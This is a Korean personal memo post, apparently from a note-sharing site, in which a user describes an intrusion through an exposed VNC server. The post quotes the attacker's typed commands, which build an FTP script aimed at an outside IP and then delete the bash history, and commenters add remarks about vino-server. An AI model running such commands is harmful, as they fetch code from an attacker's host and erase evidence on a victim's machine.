메모智 유머사진 환영합니다, 손님!    메모지 | 회원가입 | 로그인
검색도움말 메모지 검색
  재미메모智.COM 설치   •   메모智 홈   •   바깥고리   •   전체 메모智 목록   •   회원가입   •   로그인   •   도움말   •  
 
VNC를 타고 들어오는 해킹 사례 (해킹;VNC;backdoor;)
메모智 -> 해킹; 피해; backdoor; VNC;
VNC를 타고 들어오는 해킹 사례
어제 집에서 VNC를 이용하여 회사 PC로 접속했는데 내가 입력하지 않았음에도 누군가 입력을 한다...
해킹당했다...
무섭다...
입력예는 다음과 같다.

$ del eq&echo open 94.156.162.165 17704 >> eq&ecne
$ rm .bash_history
$ exit

netsta으로 네트워크 접속상황을 보니 avt-profile-1이라는 접속이 맺어져 있다.
이게 상관이 있는 걸까???

$ netstat | grep EST
tcp 0 0 XXX.XXX.XXX.XXX:56421 120.50.133.14:avt-profile-1 ESTABLISHED


어쨌던 급하게 VNCserver를 종료시켰다.
웹을 뒤져보니 VNC를 타고 들어오는 백도어형태의 공격이라고 한다.
해결방법을 좀 더 찾아봐야겠다.
작성자: 써기 추천수: 0 첨부파일: 0 등록일: 공개 MEMO
이 메모智에 달린 꼬리표 #해킹 #VNC #backdoor 로그인후 꼬리표 입력가능 회원만 꼬리표 입력 가능합니다.
jinsuk
TeamViewer로 갈아타야 하려나??? VNC보다는 좀 느려서 안쓸려고 했는데...
jinsuk
아침에 누군가 다시 유사한 입력을 하는 예가 또다시 발생했다. PC쪽의 VNC-server가 이미 노출되어 있는 상태였다. 그리고 또 하나의 문제는 Gnome에 패키지로 포함되는 VNC인 vino-server를 타고 해커들이 침입한다는 것이다. 겨우 vino-server까지 내렸다. 더 이상 문제가 없어야 할 텐데...
jinsuk
공개소프트웨어가 좋긴 하지만 이런 부분에서는 문제가 발생하는군... 일단 느리긴 하지만 팀뷰어로 갈아타야 겠다.

 

drupal hit counter

Site Stat
검색
Custom Search
모든 지식은 개인의 소유입니다.
그 외의 다른 내용은 Copyright © since 2010, 메모智.com이 가집니다.
메모지사용시 주의사항연락처powered by 크리스탈